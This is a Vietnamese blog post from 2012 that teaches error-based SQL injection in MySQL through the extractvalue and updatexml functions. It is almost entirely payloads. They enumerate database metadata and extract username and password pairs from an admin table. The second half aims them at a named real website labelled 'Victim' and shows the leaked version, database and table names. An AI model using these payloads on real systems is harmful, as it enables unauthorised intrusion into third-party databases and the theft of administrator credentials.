Thứ Hai, 2 tháng 7, 2012
Khai thác xPath SQL Injection
-Đầu tiên khai thác basic info"
and extractvalue(rand(),concat(0x0a,version()))-- -
and extractvalue(rand(),concat(0x0a,database()))-- -
-Khai thác tables"
and extractvalue(rand(),concat(0x0a,(select concat(table_name) from
information_schema.tables where table_schema=database() limit 0,1)))-- -
-Khi tăng limit 1,1 hay limit 2,1. Các tables sẽ hiện ra
-Khai thác columns (get từ adm_members):
and extractvalue(rand(),concat(0x0a,(select concat(column_name) from
information_schema.columns where table_schema=database() and
table_name=0x61646d5f6d656d62657273 limit 0,1)))-- -
-Khai thác từ columns:
and extractvalue(rand(),concat(0x0a,(select concat(username,0x7c,password) from adm_members limit 0,1)))-- -
=>Còn 1 loại xPath nữa là updatexml sẽ post sau
----------------------------Phần updatexml-------------------------------------------
Victim : http://vietbuy.biz/index.php?mod=st&id=1
Method:
extractvalue
updatexml
Get version(), database(), user()
Mã:
http://vietbuy.biz/index.php?mod=st&id=1 and updatexml(0,concat(0x7c,version(),0x7c,database(), 0x7c,user()),0)-- -
Mã:
http://vietbuy.biz/index.php?mod=st&id=1 and extractvalue(rand(),concat(0x7c,version(),0x7c,dat abase(),0x7c,user()))--
MySQL Error: XPATH syntax error: '|5.1.57|vnbirbrx_mega|vnbirbrx_m'
Get table_name:
Mã:
http://vietbuy.biz/index.php?mod=st&id=1 and extractvalue(rand(),concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))--
Mã:
http://vietbuy.biz/index.php?mod=st&id=1 and updatexml(0,concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)),0)-- -
MySQL Error: XPATH syntax error: '|adm_members'
đây là bài đầy đủ mình viết bên MMD nhưng giờ MMD die rùi post lại nè
Đăng ký:
Đăng Nhận xét (Atom)
Không có nhận xét nào: